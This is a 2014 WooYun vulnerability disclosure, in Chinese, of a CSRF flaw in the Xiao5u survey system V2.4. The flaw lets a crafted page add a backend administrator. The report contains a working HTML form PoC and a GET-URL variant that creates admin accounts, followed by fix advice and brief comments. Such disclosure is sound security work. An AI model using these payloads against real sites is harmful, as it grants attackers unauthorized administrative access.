当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081333

漏洞标题:校无忧某系统CSRF添加后台管理员帐号(2种姿势)

相关厂商:校无忧

漏洞作者: px1624

提交时间:2014-10-30 15:44

修复时间:2015-01-28 15:46

公开时间:2015-01-28 15:46

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

通用系统,由于可以免费使用基础功能,所以用户量还可以额。

详细说明:

测试系统信息(官网最新版):
官网:http://www.xiao5u.com/Product/Survey.html
系统名称:校无忧问卷调查系统
系统版本:V2.4
##1 后台添加管理员帐号的请求如下。

1.jpg


##2 经过测试发现请求没有验证referer,所以可以构造外部poc来进行CSRF攻击,POC测试代码如下。

<form id="csrfdemo" action="http://127.0.0.1/asp/Survey/admin/Admin.asp" method="POST">
<input type='hidden' name='Username' value='test111'><input type='hidden' name='Password1' value='123456'><input type='hidden' name='Password2' value='123456'><input type='hidden' name='action' value='yes'>
</form>
<button onclick="document.getElementById('csrfdemo').submit()">测试</button>


##3 测试中又发现,这里对于请求的类型也没有做严格的判断,所以可以将POST请求改写为GET请求。
http://127.0.0.1/asp/Survey/admin/Admin.asp?Username=test222&Password1=123456&Password2=123456&action=yes
##4 这样又以另外一种姿势可以CSRF攻击了。

2.jpg


##5 当后台管理访问了攻击者精心构造的URL,或者利用<img src=xxx>这种方式访问了图片,也会发起一次GET请求。那么就会自动给后台添加一个管理员。这样,攻击者就可以直接用新添加管理员帐号和密码进行后台的登录了。

漏洞证明:

看上面。

修复方案:

1 验证请求类型。
2 验证referer信息。

版权声明:转载请注明来源 px1624@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2014-10-30 16:33 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    小厂商。。。

  2. 2015-01-20 09:13 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    @px1624 厂商没确认 但是我看乌云给钱了 给了多少?(๑ŐдŐ)b

  3. 2015-01-20 10:36 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @蛇精病 100

  4. 2015-01-20 11:21 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    @px1624 搜噶~~